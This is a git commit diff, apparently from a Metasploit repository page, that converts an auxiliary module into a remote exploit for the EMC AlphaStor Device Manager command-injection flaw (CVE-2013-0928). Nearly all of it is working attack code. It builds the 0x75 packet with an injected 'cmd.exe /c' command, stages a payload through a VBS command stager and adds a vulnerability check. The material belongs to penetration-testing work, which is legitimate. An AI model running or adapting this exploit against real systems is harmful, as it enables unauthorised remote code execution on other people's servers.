Conver to exploit
parent
d4a8b7e00d
commit
df278dd2dc
|
@ -1,56 +1,121 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75',
|
||||
'Name' => 'EMC AlphaStor Device Manager Opcode 0x75 Command Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a design flaw within the Device
|
||||
Manager (rrobtd.exe) which listens on port 3000. When
|
||||
parsing the 0x75 command, the process does not properly
|
||||
filter user supplied input allowing for arbitrary command
|
||||
injection.
|
||||
This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75
|
||||
command, the process does not properly filter user supplied input allowing for arbitrary
|
||||
command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116
|
||||
with Windows 2003 SP2 and Windows 2008 R2.
|
||||
},
|
||||
'Author' => [
|
||||
'Preston Thornburn', # prestonthornburg@gmail.com
|
||||
'Mohsan Farid', # faridms@gmail.com
|
||||
'Brent Morris' # inkrypto@gmail.com
|
||||
'Author' =>
|
||||
[
|
||||
'Anyway <Aniway.Anyway[at]gmail.com>', # Vulnerability Discovery
|
||||
'Preston Thornburn <prestonthornburg[at]gmail.com>', # msf module
|
||||
'Mohsan Farid <faridms[at]gmail.com>', # msf module
|
||||
'Brent Morris <inkrypto[at]gmail.com>', # msf module
|
||||
'juan vazquez' # convert aux module into exploit
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2013-0928'],
|
||||
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-033/' ]
|
||||
['ZDI', '13-033']
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'EMC AlphaStor 4.0 < build 800 / Windows Universal', {} ]
|
||||
],
|
||||
'CmdStagerFlavor' => 'vbs',
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jan 18 2013'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
|
||||
Opt::RPORT(3000)
|
||||
], self.class )
|
||||
end
|
||||
|
||||
def run
|
||||
connect
|
||||
padding = Rex::Text.rand_text_alpha_upper(512)
|
||||
|
||||
packet = "\x75~ mminfo &cmd.exe /c #{datastore['CMD']} #{padding}"
|
||||
|
||||
print_status("Sending command \'#{datastore['CMD']}\' to the remote host...")
|
||||
|
||||
sock.put(packet)
|
||||
|
||||
res = sock.get_once
|
||||
if res
|
||||
print_status("#{Rex::Text.to_hex_dump(res)}")
|
||||
def check
|
||||
packet = "\x75~ mminfo & #{rand_text_alpha(512)}"
|
||||
res = send_packet(packet)
|
||||
if res && res =~ /Could not fork command/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
execute_cmdstager({ :linemax => 487 })
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
padding = rand_text_alpha_upper(489 - cmd.length)
|
||||
packet = "\x75~ mminfo &cmd.exe /c #{cmd} & #{padding}"# #{padding}"
|
||||
connect
|
||||
sock.put(packet)
|
||||
begin
|
||||
sock.get_once
|
||||
rescue EOFError
|
||||
fail_with(Failure::Unknown, "Failed to deploy CMD Stager")
|
||||
end
|
||||
disconnect
|
||||
end
|
||||
|
||||
def execute_cmdstager_begin(opts)
|
||||
if flavor =~ /vbs/ && self.decoder =~ /vbs_b64/
|
||||
cmd_list.each do |cmd|
|
||||
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\")")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def send_packet(packet)
|
||||
connect
|
||||
|
||||
sock.put(packet)
|
||||
begin
|
||||
meta_data = sock.get_once(8)
|
||||
rescue EOFError
|
||||
meta_data = nil
|
||||
end
|
||||
|
||||
unless meta_data
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
code, length = meta_data.unpack("N*")
|
||||
|
||||
unless code == 1
|
||||
disconnect
|
||||
return nil
|
||||
end
|
||||
|
||||
begin
|
||||
data = sock.get_once(length)
|
||||
rescue EOFError
|
||||
data = nil
|
||||
ensure
|
||||
disconnect
|
||||
end
|
||||
|
||||
data
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue